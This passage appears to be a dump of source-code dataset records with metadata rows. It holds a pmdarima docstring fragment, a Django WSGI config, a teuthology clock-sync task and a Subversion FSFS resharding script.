are no constraints on maximum order.
m : int, optional (default=1)
The period for seasonal differencing, ``m`` refers to the number of
periods in each season. For example, ``m`` is 4 for quarterly data, 12
for monthly data, or 1 for annual (non-seasonal) data. Default is 1.
Note that if ``m`` == 1 (i.e., is non-seasonal), ``seasonal`` will be
set to False. For more information on setting this parameter, see
:ref:`period`.
seasonal : bool, optional (default=True)
Whether to fit a seasonal ARIMA. Default is True. Note that if
``seasonal`` is True and ``m`` == 1, ``seasonal`` will be set to False.
stationary : bool, optional (default=False)
Whether the time-series is stationary and ``d`` should be set to zero.
information_criterion : str, optional (default='aic')
The information criterion used to select the best ARIMA model. One of
``pmdarima.arima.auto_arima.VALID_CRITERIA``, ('aic', 'bic', 'hqic',
'oob').
alpha : float, optional (default=0.05)
Level of the test for testing significance.
test : str, optional (default='kpss')
Type of unit root test to use in order to detect stationarity if
``stationary`` is False and ``d`` is None. Default is 'kpss'
(Kwiatkowski–Phillips–Schmidt–Shin).
seasonal_test : str, optional (default='ocsb')
This determines which seasonal unit root test is used if ``seasonal``
is True and ``D`` is None. Default is 'OCSB'.
stepwise : bool, optional (default=True)
Whether to use the stepwise algorithm outlined in Hyndman and Khandakar
(2008) to identify the optimal model parameters. The stepwise algorithm
can be significantly faster than fitting all (or a ``random`` subset
of) hyper-parameter combinations and is less likely to over-fit
the model.
n_jobs : int, optional (default=1)
The number of models to fit in parallel in the case of a grid search
(``stepwise=False``). Default is 1, but -1 can be used to designate
"as many as possible".
start_params : array-like, optional (default=None)
Starting parameters for ``ARMA(p,q)``. If None, the default is given
by ``ARMA._fit_start_params``.
transparams : bool, optional (default=True)
Whether or not to transform the parameters to ensure stationarity.
Uses the transformation suggested in Jones (1980). If False,
no checking for stationarity or invertibility is done.
method : str, one of ('css-mle','mle','css'), optional (default=None)
This is the loglikelihood to maximize. If "css-mle", the
conditional sum of squares likelihood is maximized and its values
are used as starting values for the computation of the exact
likelihood via the Kalman filter. If "mle", the exact likelihood
is maximized via the Kalman Filter. If "css" the conditional sum
of squares likelihood is maximized. All three methods use
`start_params` as starting parameters. See above for more
information. If fitting a seasonal ARIMA, the default is 'lbfgs'
trend : str or None, optional (default=None)
The trend parameter. If ``with_intercept`` is True, ``trend`` will be
used. If ``with_intercept`` is False, the trend will be set to a no-
intercept value.
solver : str or None, optional (default='lbfgs')
Solver to be used. The default is 'lbfgs' (limited memory
Broyden-Fletcher-Goldfarb-Shanno). Other choices are 'bfgs',
'newton' (Newton-Raphson), 'nm' (Nelder-Mead), 'cg' -
(conjugate gradient), 'ncg' (non-conjugate gradient), and
'powell'. By default, the limited memory BFGS uses m=12 to
approximate the Hessian, projected gradient tolerance of 1e-8 and
factr = 1e2. You can change these by using kwargs.
maxiter : int, optional (default=None)
The maximum number of function evaluations. Statsmodels defaults this
value to 50 for SARIMAX models and 500 for ARIMA and ARMA models. If
passed as None, will use the seasonal order to determine which to use
(50 for seasonal, 500 otherwise).
disp : int, optional (default=0)
If True, convergence information is printed. For the default
'lbfgs' ``solver``, disp controls the frequency of the output during
the iterations. disp < 0 means no output in this case.
callback : callable, optional (default=None)
Called after each iteration as callback(xk) where xk is the current
parameter vector. This is only used in non-seasonal ARIMA models.
offset_test_args : dict, optional (default=None)
The args to pass to the constructor of the offset (``d``) test. See
``pmdarima.arima.stationarity`` for more details.
seasonal_test_args : dict, optional (default=None)
The args to pass to the constructor of the seasonal offset (``D``)
test. See ``pmdarima.arima.seasonality`` for more details.
suppress_warnings : bool, optional (default=False)
Many warnings might be thrown inside of statsmodels. If
``suppress_warnings`` is True, all of the warnings coming from
``ARIMA`` will be squelched.
error_action : str, optional (default='warn')
If unable to fit an ``ARIMA`` due to stationarity issues, whether to
warn ('warn'), raise the ``ValueError`` ('raise') or ignore ('ignore').
Note that the default behavior is to warn, and fits that fail will be
returned as None. This is the recommended behavior, as statsmodels
ARIMA and SARIMAX models hit bugs periodically that can cause
an otherwise healthy parameter combination to fail for reasons not
related to pmdarima.
trace : bool, optional (default=False)
Whether to print status on the fits. Note that this can be
very verbose...
random : bool, optional (default=False)
Similar to grid searches, ``auto_arima`` provides the capability to
perform a "random search" over a hyper-parameter space. If ``random``
is True, rather than perform an exhaustive search or ``stepwise``
search, only ``n_fits`` ARIMA models will be fit (``stepwise`` must be
False for this option to do anything).
random_state : int, long or numpy ``RandomState``, optional (default=None)
The PRNG for when ``random=True``. Ensures replicable testing and
results.
n_fits : int, optional (default=10)
If ``random`` is True and a "random search" is going to be performed,
``n_iter`` is the number of ARIMA models to be fit.
{return_valid_fits}
out_of_sample_size : int, optional (default=0)
The ``ARIMA`` class can fit only a portion of the data if specified,
in order to retain an "out of bag" sample score. This is the
number of examples from the tail of the time series to hold out
and use as validation examples. The model will not be fit on these
samples, but the observations will be added into the model's ``endog``
and ``exog`` arrays so that future forecast values originate from the
end of the endogenous vector.
For instance::
y = [0, 1, 2, 3, 4, 5, 6]
out_of_sample_size = 2
> Fit on: [0, 1, 2, 3, 4]
> Score on: [5, 6]
> Append [5, 6] to end of self.arima_res_.data.endog values
scoring : str, optional (default='mse')
If performing validation (i.e., if ``out_of_sample_size`` > 0), the
metric to use for scoring the out-of-sample data. One of ('mse', 'mae')
scoring_args : dict, optional (default=None)
A dictionary of key-word arguments to be passed to the ``scoring``
metric.
with_intercept : bool, optional (default=True)
Whether to include an intercept term. Default is True.
sarimax_kwargs : dict or None, optional (default=None)
Keyword arguments to pass to the SARIMAX constructor, if seasonal.
{fit_args}
See Also
--------
:func:`pmdarima.arima.ARIMA`
Notes
-----
* Fitting with `stepwise=False` can prove slower, especially when
`seasonal=True`.
References
----------
.. [1] https://wikipedia.org/wiki/Autoregressive_integrated_moving_average
.. [2] R's auto-arima source code: http://bit.ly/2gOh5z2
.. [3] R's auto-arima documentation: http://bit.ly/2wbBvUN
"""
_Y_DOCSTR = """
y : array-like or iterable, shape=(n_samples,)
The time-series to which to fit the ``ARIMA`` estimator. This may
either be a Pandas ``Series`` object (statsmodels can internally
use the dates in the index), or a numpy array. This should be a
one-dimensional array of floats, and should not contain any
``np.nan`` or ``np.inf`` values.
"""
_EXOG_DOCSTR = """
exogenous : array-like, shape=[n_obs, n_vars], optional (default=None)
An optional 2-d array of exogenous variables. If provided, these
variables are used as additional features in the regression
operation. This should not include a constant or trend. Note that
if an ``ARIMA`` is fit on exogenous features, it must be provided
exogenous features for making predictions.
"""
_FIT_ARGS_DOCSTR = """
**fit_args : dict, optional (default=None)
A dictionary of keyword arguments to pass to the :func:`ARIMA.fit`
method.
"""
_VALID_FITS_DOCSTR = """
return_valid_fits : bool, optional (default=False)
If True, will return all valid ARIMA fits in a list. If False (by
default), will only return the best fit.
"""
| true | true |
f7232b9b6e151dc03922e891f067fde890f8592d | 397 | py | Python | djangochat/wsgi.py | muondu/Django-chat-app | 9474733779402cdb2c4764a9d77b8c0e4f0842fe | [
"MIT"
] | null | null | null | djangochat/wsgi.py | muondu/Django-chat-app | 9474733779402cdb2c4764a9d77b8c0e4f0842fe | [
"MIT"
] | null | null | null | djangochat/wsgi.py | muondu/Django-chat-app | 9474733779402cdb2c4764a9d77b8c0e4f0842fe | [
"MIT"
] | null | null | null | """
WSGI config for djangochat project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.1/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'djangochat.settings')
application = get_wsgi_application()
| 23.352941 | 78 | 0.788413 |
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'djangochat.settings')
application = get_wsgi_application()
| true | true |
f7232ca5356a3bbb385a26982a7f9d1e936bb891 | 2,888 | py | Python | teuthology/task/clock.py | grapheo12/teuthology | f69547410d113fea9811e5a002cc7a4689cffdbb | [
"MIT"
] | null | null | null | teuthology/task/clock.py | grapheo12/teuthology | f69547410d113fea9811e5a002cc7a4689cffdbb | [
"MIT"
] | null | null | null | teuthology/task/clock.py | grapheo12/teuthology | f69547410d113fea9811e5a002cc7a4689cffdbb | [
"MIT"
] | null | null | null | """
Clock synchronizer
"""
import logging
import contextlib
from teuthology.orchestra import run
log = logging.getLogger(__name__)
@contextlib.contextmanager
def task(ctx, config):
"""
Sync or skew clock
This will initially sync the clocks. Eventually it should let us also
skew by some number of seconds.
example::
tasks:
- clock:
- ceph:
- interactive:
to sync.
:param ctx: Context
:param config: Configuration
"""
log.info('Syncing clocks and checking initial clock skew...')
for rem in ctx.cluster.remotes.keys():
rem.run(
args = [
'sudo', 'systemctl', 'stop', 'ntp.service', run.Raw('||'),
'sudo', 'systemctl', 'stop', 'ntpd.service', run.Raw('||'),
'sudo', 'systemctl', 'stop', 'chronyd.service',
run.Raw(';'),
'sudo', 'ntpd', '-gq', run.Raw('||'),
'sudo', 'chronyc', 'makestep',
run.Raw(';'),
'sudo', 'systemctl', 'start', 'ntp.service', run.Raw('||'),
'sudo', 'systemctl', 'start', 'ntpd.service', run.Raw('||'),
'sudo', 'systemctl', 'start', 'chronyd.service',
run.Raw(';'),
'PATH=/usr/bin:/usr/sbin', 'ntpq', '-p', run.Raw('||'),
'PATH=/usr/bin:/usr/sbin', 'chronyc', 'sources',
run.Raw('||'),
'true'
],
timeout = 60,
)
try:
yield
finally:
log.info('Checking final clock skew...')
for rem in ctx.cluster.remotes.keys():
rem.run(
args=[
'PATH=/usr/bin:/usr/sbin', 'ntpq', '-p', run.Raw('||'),
'PATH=/usr/bin:/usr/sbin', 'chronyc', 'sources',
run.Raw('||'),
'true'
],
)
@contextlib.contextmanager
def check(ctx, config):
"""
Run ntpq at the start and the end of the task.
:param ctx: Context
:param config: Configuration
"""
log.info('Checking initial clock skew...')
for rem in ctx.cluster.remotes.keys():
rem.run(
args=[
'PATH=/usr/bin:/usr/sbin', 'ntpq', '-p', run.Raw('||'),
'PATH=/usr/bin:/usr/sbin', 'chronyc', 'sources',
run.Raw('||'),
'true'
],
)
try:
yield
finally:
log.info('Checking final clock skew...')
for rem in ctx.cluster.remotes.keys():
rem.run(
args=[
'PATH=/usr/bin:/usr/sbin', 'ntpq', '-p', run.Raw('||'),
'PATH=/usr/bin:/usr/sbin', 'chronyc', 'sources',
run.Raw('||'),
'true'
],
)
| 27.769231 | 76 | 0.447715 | import logging
import contextlib
from teuthology.orchestra import run
log = logging.getLogger(__name__)
@contextlib.contextmanager
def task(ctx, config):
log.info('Syncing clocks and checking initial clock skew...')
for rem in ctx.cluster.remotes.keys():
rem.run(
args = [
'sudo', 'systemctl', 'stop', 'ntp.service', run.Raw('||'),
'sudo', 'systemctl', 'stop', 'ntpd.service', run.Raw('||'),
'sudo', 'systemctl', 'stop', 'chronyd.service',
run.Raw(';'),
'sudo', 'ntpd', '-gq', run.Raw('||'),
'sudo', 'chronyc', 'makestep',
run.Raw(';'),
'sudo', 'systemctl', 'start', 'ntp.service', run.Raw('||'),
'sudo', 'systemctl', 'start', 'ntpd.service', run.Raw('||'),
'sudo', 'systemctl', 'start', 'chronyd.service',
run.Raw(';'),
'PATH=/usr/bin:/usr/sbin', 'ntpq', '-p', run.Raw('||'),
'PATH=/usr/bin:/usr/sbin', 'chronyc', 'sources',
run.Raw('||'),
'true'
],
timeout = 60,
)
try:
yield
finally:
log.info('Checking final clock skew...')
for rem in ctx.cluster.remotes.keys():
rem.run(
args=[
'PATH=/usr/bin:/usr/sbin', 'ntpq', '-p', run.Raw('||'),
'PATH=/usr/bin:/usr/sbin', 'chronyc', 'sources',
run.Raw('||'),
'true'
],
)
@contextlib.contextmanager
def check(ctx, config):
log.info('Checking initial clock skew...')
for rem in ctx.cluster.remotes.keys():
rem.run(
args=[
'PATH=/usr/bin:/usr/sbin', 'ntpq', '-p', run.Raw('||'),
'PATH=/usr/bin:/usr/sbin', 'chronyc', 'sources',
run.Raw('||'),
'true'
],
)
try:
yield
finally:
log.info('Checking final clock skew...')
for rem in ctx.cluster.remotes.keys():
rem.run(
args=[
'PATH=/usr/bin:/usr/sbin', 'ntpq', '-p', run.Raw('||'),
'PATH=/usr/bin:/usr/sbin', 'chronyc', 'sources',
run.Raw('||'),
'true'
],
)
| true | true |
f7232e73f3ca4fd8e067d2767715a445a773b3bd | 27,080 | py | Python | fsfs-reshard.py | ymartin59/svn-fsfs-reshard | 8d045a984bf4eacaaedb8f996bed7eee19f94599 | [
"Apache-2.0"
] | 2 | 2016-01-29T20:51:29.000Z | 2018-03-29T11:57:33.000Z | fsfs-reshard.py | ymartin59/svn-fsfs-reshard | 8d045a984bf4eacaaedb8f996bed7eee19f94599 | [
"Apache-2.0"
] | 3 | 2015-11-28T08:31:07.000Z | 2016-02-07T21:03:08.000Z | fsfs-reshard.py | ymartin59/svn-fsfs-reshard | 8d045a984bf4eacaaedb8f996bed7eee19f94599 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# fsfs-reshard.py REPOS_PATH
# fsfs-reshard.py REPOS_PATH -target=MAX_FILES_PER_SHARD
#
# Display repository information about fsfs db.
#
# fsfs-reshard.py REPOS_PATH MAX_FILES_PER_SHARD
#
# Perform an offline conversion of an FSFS repository between linear (format
# 2, usable by Subversion 1.4+) and sharded (format 3,4,6,7), usable by Subversion
# 1.5+) layouts.
#
# The MAX_FILES_PER_SHARD argument specifies the maximum number of files
# that will be stored in each shard (directory), or zero to specify a linear
# layout. Subversion 1.5 uses a default value of 1000 files per shard.
#
# As the repository will not be valid while the conversion is in progress,
# the repository administrator must ensure that access to the repository is
# blocked for the duration of the conversion.
#
# In the event that the conversion is interrupted, the repository will be in
# an inconsistent state. The repository administrator should then re-run
# this tool to completion.
#
#
# Note that, currently, resharding from one sharded layout to another is
# likely to be an extremely slow process. To reshard, we convert from a
# sharded to linear layout and then to the new sharded layout. The problem
# is that the initial conversion to the linear layout triggers exactly the
# same 'large number of files in a directory' problem that sharding is
# intended to solve.
#
# ====================================================================
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# ====================================================================
#
# Subversion filesystem format 4, 6 and 7 support for versions 1.6, 1.7, 1.8 and 1.9,
# unpack operation and shard file computation contributed by Yves Martin
# (ymartin1040 0x40 gmail 0x2E com)
#
# $HeadURL: http://svn.apache.org/repos/asf/subversion/trunk/tools/server-side/fsfs-reshard.py $
# $LastChangedDate: 2009-11-16 20:07:17 +0100 (Mon, 16 Nov 2009) $
# $LastChangedBy: hwright $
# $LastChangedRevision: 880911 $
import os, stat, sys, shutil
from errno import EEXIST
from sets import Set
import ConfigParser
def usage():
"""Print a usage message and exit."""
print("""usage: %s REPOS_PATH [target=MAX_FILES_PER_SHARD]
Computes shard sizes for current repository or for a target
MAX_FILES_PER_SHARD to tune this parameter according to
performance criteria.
usage: %s REPOS_PATH MAX_FILES_PER_SHARD [START END]
Perform an offline conversion of an FSFS repository between linear
(readable by Subversion 1.4 or later) and sharded (readable by
Subversion 1.5 or later) layouts.
It is recommended to first upgrade your repository to your current
Subversion release with 'svnadmin upgrade REPOS_PATH'.
Packed shards are unpacked before converting. According to your
needs, you may want to invoke 'svnadmin pack REPOS_PATH' after.
The MAX_FILES_PER_SHARD argument specifies the maximum number of
files that will be stored in each shard (directory), or zero to
specify a linear layout. Subversion 1.5 uses a default value of
1000 files per shard.
Convert revisions START through END inclusive if specified, or all
revisions if unspecified.
""" % sys.argv[0])
sys.exit(1)
def incompatible_repos_format(repos_path, format):
"""Print an error saying that REPOS_PATH is a repository with an
incompatible repository format FORMAT, then exit."""
sys.stderr.write("""error: unable to convert repository '%s'.
This repository is not compatible with this tool. Valid
repository formats are '3' or '5'; this repository is
format '%s'.
""" % (repos_path, format))
sys.stderr.flush()
sys.exit(1)
def incompatible_fs_format(repos_path, format):
"""Print an error saying that REPOS_PATH is a repository with an
incompatible filesystem format FORMAT, then exit."""
sys.stderr.write("""error: unable to open repository '%s'.
This repository contains a filesystem that is not compatible with
this tool. Valid filesystem formats are '1', '2', '3', '4' or '6'; this
repository contains a filesystem with format '%s'.
Compressed packed revprops is not supported.
Packed shards with logical addressing cannot be analyzed or unpacked.
""" % (repos_path, format))
sys.stderr.flush()
sys.exit(1)
def unexpected_fs_format_options(repos_path):
"""Print an error saying that REPOS_PATH is a repository with
unexpected filesystem format options, then exit."""
sys.stderr.write("""error: unable to open repository '%s'.
This repository contains a filesystem that appears to be invalid -
there is unexpected data after the filesystem format number.
""" % repos_path)
sys.stderr.flush()
sys.exit(1)
def incompatible_fs_format_option(repos_path, option):
"""Print an error saying that REPOS_PATH is a repository with an
incompatible filesystem format option OPTION, then exit."""
sys.stderr.write("""error: unable to convert repository '%s'.
This repository contains a filesystem that is not compatible with
this tool. This tool recognises the 'layout' and 'addressing'
options but the filesystem uses the '%s' option.
""" % (repos_path, option))
sys.stderr.flush()
sys.exit(1)
def warn_about_fs_format_1(repos_path, format_path):
"""Print a warning saying that REPOS_PATH contains a format 1 FSFS
filesystem that we can't reconstruct, then exit."""
sys.stderr.write("""warning: conversion of '%s' will be one-way.
This repository is currently readable by Subversion 1.1 or later.
This tool can convert this repository to one that is readable by
either Subversion 1.4 (or later) or Subversion 1.5 (or later),
but it is not able to convert it back to the original format - a
separate dump/load step would be required.
If you would like to upgrade this repository anyway, delete the
file '%s' and re-run this tool.
""" % (repos_path, format_path))
sys.stderr.flush()
sys.exit(1)
def check_repos_format(repos_path):
"""Check that REPOS_PATH contains a repository with a suitable format;
print a message and exit if not."""
format_path = os.path.join(repos_path, 'format')
try:
format_file = open(format_path)
format = format_file.readline()
if not format.endswith('\n'):
incompatible_repos_format(repos_path, format + ' <missing newline>')
format = format.rstrip('\n')
if format == '3' or format == '5':
pass
else:
incompatible_repos_format(repos_path, format)
except IOError:
# In all likelihood, the file doesn't exist.
incompatible_repos_format(repos_path, '<unreadable>')
def is_packed_revprops_compressed(repos_path):
"""Check if repository at REPOS_PATH has compressed revprops enabled."""
fsfsconf_path = os.path.join(repos_path, 'db', 'fsfs.conf')
try:
config = ConfigParser.ConfigParser()
config.read(fsfsconf_path)
return config.getboolean('packed-revprops', 'compress-packed-revprops')
except IOError:
# In all likelihood, the file doesn't exist.
incompatible_repos_format(repos_path, '<unreadable>')
except (ConfigParser.NoSectionError, ConfigParser.NoOptionError):
return False # Likely section is lacking or option is commented
def check_packed_shards_logical(fs_format, min_unpacked_rev):
"""Check if repository with logical addressing has packed shards."""
if fs_format[2] == "logical" and min_unpacked_rev > 0:
sys.stdout.write("\n")
sys.stdout.flush()
sys.stderr.write("Packed shards with logical addressing cannot be analyzed or unpacked.\n")
sys.stderr.flush()
sys.exit(1)
return False
def check_fs_format(repos_path):
"""Check that REPOS_PATH contains a filesystem with a suitable format,
or that it contains no format file; print a message and exit if neither
is true. Return an array [format number, shard size] whether the filesystem is sharded."""
result = [0, 0, None]
db_path = os.path.join(repos_path, 'db')
format_path = os.path.join(db_path, 'format')
if not(os.path.exists(format_path)):
# Recover from format.bak if interrupted
format_path = os.path.join(db_path, 'format.bak')
if not(os.path.exists(format_path)):
sys.stderr.write("error: db/format and db/format.bak missing.\n")
sys.stderr.flush()
sys.exit(1)
try:
format_file = open(format_path)
format = format_file.readline()
if not format.endswith('\n'):
incompatible_fs_format(repos_path, format + ' <missing newline>')
format = format.rstrip('\n')
if format == '1':
# This is a format 1 (svndiff0 only) filesystem. We can upgrade it,
# but we can't downgrade again (since we can't uncompress any of the
# svndiff1 deltas that may have been written). Warn the user and exit.
warn_about_fs_format_1(repos_path, format_path)
if format == '2' or format == '3' or format == '4' or format == '6' or format == '7':
pass
else:
incompatible_fs_format(repos_path, format)
result[0] = format;
for line in format_file:
if format == '2':
unexpected_fs_format_options(repos_path)
line = line.rstrip('\n')
if line == 'layout linear':
pass
elif line.startswith('layout sharded '):
result[1] = int(line[15:])
elif line.startswith('addressing '):
result[2] = line[11:]
else:
incompatible_fs_format_option(repos_path, line)
format_file.close()
except IOError:
# The format file might not exist if we've previously been interrupted,
# or if the user is following our advice about upgrading a format 1
# repository. In both cases, we'll just assume the format was
# compatible.
pass
return result
def current_file(repos_path):
"""Return triple of (revision, next_node_id, next_copy_id) from
REPOS_PATH/db/current ."""
return open(os.path.join(repos_path, 'db', 'current')).readline().split()
def backup_fs_format(repos_path):
"""Rename the filesystem format file for repository REPOS_PATH.
Do not raise an error if the file is already renamed."""
format_path = os.path.join(repos_path, 'db', 'format')
try:
statinfo = os.stat(format_path)
except OSError:
# The file probably doesn't exist.
return
format_bak_path = os.path.join(repos_path, 'db', 'format.bak')
# On Windows, we need to ensure the file is writable before we can
# rename/remove it.
os.chmod(format_path, statinfo.st_mode | stat.S_IWUSR)
try:
os.rename(format_path, format_bak_path)
except OSError:
# Unexpected but try to go on
os.remove(format_bak_path)
os.rename(format_path, format_bak_path)
def write_fs_format(repos_path, fs_format):
"""Write a new filesystem format file for repository REPOS_PATH
according to fs_format information."""
format_path = os.path.join(repos_path, 'db', 'format')
format_bak_path = os.path.join(repos_path, 'db', 'format.bak')
# Permissions and owner/group are preserved with rename
try:
os.rename(format_bak_path, format_path)
except OSError:
# Unexpected but try to go on
os.remove(format_path)
f = open(format_path, 'wb')
f.write(fs_format[0]) # Version
f.write('\n')
if fs_format[0] > 2:
if fs_format[1] > 0:
f.write('layout sharded %d\n' % fs_format[1])
else:
f.write('layout linear\n')
if fs_format[0] > 6 and fs_format[2] != None:
f.write('addressing %s\n' % fs_format[2])
f.close()
def suffix_unpacked_shard(path):
"""Add '.shard' suffix to unpacked shard number directory."""
for name in os.listdir(path):
if name.endswith('.shard') or name.endswith('.pack'):
continue
subdir_path = os.path.join(path, name)
if not os.path.isdir(subdir_path):
continue
os.rename(subdir_path, subdir_path + '.shard')
def linearise(path):
"""Move all the files in subdirectories of PATH into PATH, and remove the
subdirectories. Handle conflicts between subdirectory names and files
contained in subdirectories by ensuring subdirectories have a '.shard'
suffix prior to moving (the files are assumed not to have this suffix.
Abort if a subdirectory is found to contain another subdirectory."""
suffix_unpacked_shard(path)
# Now move all the subdirectory contents into the parent and remove
# the subdirectories.
for root_path, dirnames, filenames in os.walk(path):
if root_path == path:
continue
if len(dirnames) > 0:
sys.stderr.write("error: directory '%s' contains other unexpected directories.\n" \
% root_path)
sys.stderr.flush()
sys.exit(1)
for name in filenames:
from_path = os.path.join(root_path, name)
to_path = os.path.join(path, name)
os.rename(from_path, to_path)
os.rmdir(root_path)
def shard(path, max_files_per_shard, start, end):
"""Move the files for revisions START to END inclusive in PATH into
subdirectories of PATH named such that subdirectory '0' contains at most
MAX_FILES_PER_SHARD files, those named [0, MAX_FILES_PER_SHARD). Abort if
PATH is found to contain any entries with non-numeric names."""
tmp = path + '.reshard'
try:
os.mkdir(tmp)
except OSError, e:
if e.errno != EEXIST:
raise
# Move all entries into shards named N.shard.
for rev in range(start, end + 1):
name = str(rev)
shard = rev // max_files_per_shard
shard_name = str(shard) + '.shard'
from_path = os.path.join(path, name)
to_path = os.path.join(tmp, shard_name, name)
try:
os.rename(from_path, to_path)
except OSError:
# The most likely explanation is that the shard directory doesn't
# exist. Let's create it and retry the rename.
os.mkdir(os.path.join(tmp, shard_name))
os.rename(from_path, to_path)
# Now rename all the shards to remove the suffix.
skipped = 0
for name in os.listdir(tmp):
if not name.endswith('.shard'):
sys.stderr.write("warning: ignoring unexpected subdirectory '%s'.\n" \
% os.path.join(tmp, name))
sys.stderr.flush()
skipped += 1
continue
from_path = os.path.join(tmp, name)
to_path = os.path.join(path, os.path.basename(from_path)[:-6])
os.rename(from_path, to_path)
skipped == 0 and os.rmdir(tmp)
def extract_part(source, start_position, end_position, target_file):
"""Extract source from start to end position to a target file"""
copy_buffer_size = 4096
if not os.path.exists(os.path.dirname(target_file)):
os.makedirs(os.path.dirname(target_file))
target = open(target_file, 'wb')
last_position = start_position
source.seek(last_position)
while last_position < end_position:
bytes_tocopy = copy_buffer_size
if (end_position - last_position) < copy_buffer_size:
bytes_tocopy = end_position - last_position
rev_buffer = source.read(bytes_tocopy)
target.write(rev_buffer)
last_position += len(rev_buffer)
if bytes_tocopy < copy_buffer_size:
break
target.close()
return last_position
def unpack_shard(packed_path, shard_number, unpack, first_rev, revs_size):
"""Compute revision sizes in a packed shard at packed_path and unpack revisions
if unpack is True. The first revision of the shard has first_rev number.
Revision sizes are stored in rev_sizes dictionnary.
"""
manifest = open(os.path.join(packed_path, 'manifest'), 'r')
pack_path = os.path.join(packed_path, 'pack')
end_pack = os.path.getsize(pack_path)
if unpack:
pack = open(pack_path, 'rb')
last_position = int(manifest.readline())
rev_index = first_rev
while last_position < end_pack:
# Read next revision start byte in pack file
try:
byte_position = int(manifest.readline())
except ValueError:
# last revision: end of pack file
byte_position = end_pack
revs_size[rev_index] = byte_position - last_position
if unpack:
# Extract revision from pack file to corresponding shard
arev = os.path.join(packed_path, os.path.pardir, str(shard_number), str(rev_index))
last_position = extract_part(pack, last_position, byte_position, arev)
else:
last_position = byte_position
rev_index += 1
# Close file descriptors
manifest.close()
if unpack:
pack.close()
return revs_size
def unpack_revprops_shard(packed_path, shard_number, first_rev):
"""Unpack a single revision properties shard to linear mode"""
revprops_packfile = {}
packfiles = Set()
with open(os.path.join(packed_path, 'manifest'), 'rb') as manifest:
for revfile in manifest:
revfile = revfile.rstrip('\n')
revprops_packfile[first_rev] = revfile
packfiles.add(revfile)
first_rev += 1
for apackfile in packfiles:
packrevprops = open(os.path.join(packed_path, apackfile), 'rb')
packrevprops.read(2) # Skip uncompressed content size
# Parse revprops sizes
rev = int(packrevprops.readline())
rev_count = int(packrevprops.readline())
end_rev = rev + rev_count - 1
revprop_sizes = {}
for r in range(rev, rev + rev_count):
revprop_sizes[r] = int(packrevprops.readline())
packrevprops.readline()
last_position = packrevprops.tell()
while rev <= end_rev:
end_position = last_position + revprop_sizes[rev]
if apackfile == revprops_packfile[rev]:
# Extract revprop declared in manifest
arev = os.path.join(packed_path, os.path.pardir, str(shard_number), str(rev))
last_position = extract_part(packrevprops, last_position, end_position, arev)
else:
last_position = end_position
rev += 1
# Close file descriptors
packrevprops.close()
def unpack_revprops_shards(revprops_path, current_shard):
"""Unpack revision properties shards"""
for root_path, dirnames, filenames in os.walk(revprops_path):
if len(dirnames) > 0:
for name in dirnames:
if (not(name.endswith('.pack'))):
continue
shard_number = int(name[:-5])
shard_path = os.path.join(root_path, name)
unpack_revprops_shard(shard_path, shard_number,
current_shard * shard_number if shard_number > 0 else 1)
# remove x.pack structure
shutil.rmtree(shard_path)
def compute_rev_sizes(revs_path, current_shard, unpack):
"""Compute revision sizes based on current shard capacity Support either
linear, sharded or packed revisions. If unpack is True, packed sharded are
unpacked too.
"""
revs_size = {}
for root_path, dirnames, filenames in os.walk(revs_path):
if len(filenames) > 0:
for name in filenames:
try:
revnum = int(name)
revs_size[revnum] = os.path.getsize(os.path.join(root_path, name))
except ValueError:
pass
if len(dirnames) > 0:
for name in dirnames:
if (not(name.endswith('.pack'))):
continue
shard_number = int(name[:-5])
shard_path = os.path.join(root_path, name)
# get revision sizes from packed shard [and unpack]
revs_size = unpack_shard(shard_path, shard_number, unpack,
current_shard * shard_number, revs_size)
if unpack:
# remove x.pack structure
shutil.rmtree(shard_path)
return revs_size
def compute_shard_sizes(revs_size, max_files_per_shard):
"""Compute shard sizes based on target max_files_per_shard
and map of revision size."""
current_shard = 0
current_shard_size = 0
min_shard_size = 2**63
max_shard_size = 0
shard_size_sum = 0
for i, size in revs_size.iteritems():
current_shard_size += size
if ((i + 1) % max_files_per_shard) == 0:
print 'Shard %d size: %d' % (current_shard, current_shard_size)
shard_size_sum += current_shard_size
if current_shard_size < min_shard_size:
min_shard_size = current_shard_size
if current_shard_size > max_shard_size:
max_shard_size = current_shard_size
current_shard_size = 0
current_shard += 1
if current_shard_size != 0:
print 'Shard %d size: %d' % (current_shard, current_shard_size)
if current_shard > 0:
print 'Average full-shard size %d. Minimum: %d, Maximum: %d.' \
% ((shard_size_sum / current_shard), min_shard_size, max_shard_size)
def reset_min_unpacked(min_unpacked_rev_path):
"""Reset min-unpacked-rev after unpack."""
with open(min_unpacked_rev_path, 'wb') as min_unpacked_rev_file:
min_unpacked_rev_file.write('0\n')
def print_estimate_shards(repos_path, fs_format, min_unpacked_rev):
"""Print repository information and computes shard sizes for the specified
target
"""
fs_format = check_fs_format(repos_path)
target_shard = fs_format[1]
if len(sys.argv) == 3 and sys.argv[2].startswith('target='):
try:
target_shard = int(sys.argv[2][7:]) # Remove "target="
except ValueError, OverflowError:
sys.stderr.write("error: target maximum files per shard ('%s') is not a valid number.\n" \
% sys.argv[2])
sys.stderr.flush()
sys.exit(1)
revs_path = os.path.join(repos_path, 'db', 'revs')
sys.stdout.write("Current FSFS db format version ")
sys.stdout.write(fs_format[0])
if fs_format[1] > 0:
sys.stdout.write(" with sharded layout, max files per shard: ")
sys.stdout.write(str(fs_format[1]))
if min_unpacked_rev > 0:
sys.stdout.write(", packed shards: ")
sys.stdout.write(str(min_unpacked_rev / fs_format[1]))
else:
sys.stdout.write(" with linear layout")
check_packed_shards_logical(fs_format, min_unpacked_rev) # and exits if so
if target_shard > 0:
sys.stdout.write(".\nList of shard sizes for max files per shard = ")
sys.stdout.write(str(target_shard))
sys.stdout.write("\n")
